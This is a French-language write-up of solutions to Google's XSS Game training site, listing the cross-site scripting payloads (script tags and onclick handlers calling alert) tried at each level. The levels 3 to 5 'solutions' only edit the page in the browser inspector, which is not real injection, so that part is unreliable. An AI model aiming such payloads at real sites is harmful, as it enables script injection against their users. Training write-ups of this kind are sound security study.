Envie de tester vos connaissances des failles XSS ? Allez faire un tour sur le site XSS-Game de Google

XSS Game: https://xss-game.appspot.com/

[1/6] Level 1: Hello, world of XSS

payload:

<script>alert('xss');</script>

[2/6] Level 2: Persistence is key

Description: Page pour poster des messages.

tests et payload:

#1
<script>alert('xss');</script>
# marche pas

#2 
<sCript>alert('xss');</sCript>
# marche pas

#3
<button></button>
# fonctionne :)

# Payload
<button onclick="alert('XSS')">XSS</button>

[3/6] Level 3: That sinking feeling…

Description: Page pour afficher des images.

Solution: On ouvre l’inspecteur et on modifie le code comme suit:

<img src="/static/level3/cloud3.jpg" onclick="alert('xss')">

[4/6] Level 4: Context matters

Description: Page avec une fonction de timer et une image comme logo.

Solution: Même type de payload que le niveau précédant… Ouvrir l’inspecteur et modifier le code comme suit:

<img src="/static/logos/level4.png" onclick="alert('xss')">

[5/6] Level 5: Breaking protocol

Solution: Même chose que précédemment…

<img src="/static/logos/level5.png" onclick="alert('xss')">

[6/6] Level 6: Follow the rabbit

Solution: Heberger une page contenant un simple script et appeler cette page dans l’url

This work is licensed under a Creative Commons Attribution 4.0 International License.